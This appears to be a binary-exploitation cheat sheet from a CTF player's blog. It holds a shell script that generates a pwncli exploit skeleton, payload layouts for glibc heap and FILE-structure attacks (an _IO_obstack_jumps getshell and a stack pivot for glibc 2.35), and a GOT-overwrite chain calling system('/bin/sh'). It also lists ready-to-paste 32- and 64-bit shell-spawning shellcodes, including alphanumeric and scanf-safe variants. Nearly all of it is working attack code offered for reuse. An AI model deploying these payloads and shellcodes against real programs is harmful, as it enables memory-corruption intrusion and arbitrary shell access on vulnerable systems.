[cheatsheet]
pwncli_template
maybe u can use a pwncli template
generated in shell~LOL
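#!/bin/sh
# Write a pwncli exploit skeleton to ./exp.py (overwriting it, as the original
# did) and open it in the editor.
#
# Why a here-document instead of a chain of echo calls:
#   - `echo -n` is not portable across /bin/sh implementations (the "-n" may be
#     printed literally), and escaped quotes inside echo strings are error-prone;
#   - the skeleton must be valid Python, so the indentation of the `if` block
#     and the helper bodies has to survive verbatim into exp.py.
set -eu

out=exp.py

# Timestamp recorded in the generated file's header docstring.
ttime=$(date +"%Y-%m-%d %H:%M:%S")

# The delimiter is unquoted so $ttime expands; the template contains no other
# `$`, backtick or backslash sequences, so everything else is written as-is.
cat > "$out" <<EOF
#!/usr/bin/env python3
'''
Author:7resp4ss
Date:$ttime
Usage:
Debug : python3 exp.py debug elf-file-path -t -b malloc
Remote: python3 exp.py remote elf-file-path ip:port
'''

from pwncli import *
cli_script()
io: tube = gift.io
elf: ELF = gift.elf
libc: ELF = gift.libc
filename = gift.filename  # current filename
is_debug = gift.debug  # is debug or not
is_remote = gift.remote  # is remote or not
gdb_pid = gift.gdb_pid  # gdb pid if debug
if gift.remote:
    libc = ELF("./libc-2.23.so")
    gift["libc"] = libc


def cmd(i, prompt):
    # TODO: the helpers below pass only the menu choice; give prompt a default
    # that matches the target's menu text before running this script.
    sla(prompt, i)


def add():
    cmd('1')
    # ......


def edit():
    cmd('2')
    # ......


def show():
    cmd('3')
    # ......


def dele():
    cmd('4')
    # ......


ia()
EOF

code "$out"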
_IO_obstack_jumps
- getshell:
payload = flat(
{
0x18:1,
0x20:0,
0x28:1,
0x30:0,
0x38:address_for_call,
0x48:address_for_rdi,
0x50:1,
0xd8:&_IO_obstack_jumps+0x20,
0xe0:this_mem_address,
},
filler = '\x00'
)
- stack_migrate_final_in_2.35:
gg1 = libc.search(asm("mov rdx, qword ptr [rdi + 8]; mov qword ptr [rsp], rax; call qword ptr [rdx + 0x20]")).__next__() + libc_base
gg2 = libc.search(asm("mov rsp, rdx; ret")).__next__() + libc_base
gg3 = libc.search(asm('add rsp, 0x30; mov rax, r12; pop r12; ret')).__next__() + libc_base
flat(
{
0x0:gg3,
0x8:[
this_heap_address,
],
0x20:[
gg2
],
0x40:
[
rop_payload,
],
},
)
- magic_gadget_015dc3:
0x900:[
CurrentGadgets.write_by_magic(elf.got.puts,libc.sym.puts,libc.sym.system),
CurrentGadgets.pop_rdi_ret(),
0x601060+0x980,
CurrentGadgets.ret(),
CurrentGadgets.ret(),
elf.plt.puts
],
0x980:'/bin/sh>&2\x00'
shellcode
# 32位 短字节shellcode --> 21字节
\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80
# 32位 纯ascii字符shellcode
PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJISZTK1HMIQBSVCX6MU3K9M7CXVOSC3XS0BHVOBBE9RNLIJC62ZH5X5PS0C0FOE22I2NFOSCRHEP0WQCK9KQ8MK0AA
# 32位 scanf可读取的shellcode
\xeb\x1b\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x29\xc0\xaa\x89\xf9\x89\xf0\xab\x89\xfa\x29\xc0\xab\xb0\x08\x04\x03\xcd\x80\xe8\xe0\xff\xff\xff/bin/sh
# 64位 scanf可读取的shellcode 22字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\xb0\x3b\x99\x0f\x05
# 64位 较短的shellcode 23字节
\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05
# 64位 纯ascii字符shellcode
Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t
#call rdx
RRYh00AAX1A0hA004X1A4hA00AX1A8QX44Pj0X40PZPjAX4znoNDnRYZnCXAa
retf
to32='\xC7\x44\x24\x04\x23\x00\x00\x00\xCB'
to64='\xC7\x44\x24\x04\x33\x00\x00\x00\xCB'
# to32: ;;将CPU模式转换为32位
# mov DWORD [rsp+4],0x23 ;;32位
# retf
# to64: ;;将CPU模式转换为64位
# mov DWORD [esp+4],0x33 ;;64位
# retf
From: https://www.cnblogs.com/7resp4ss/p/17100347.html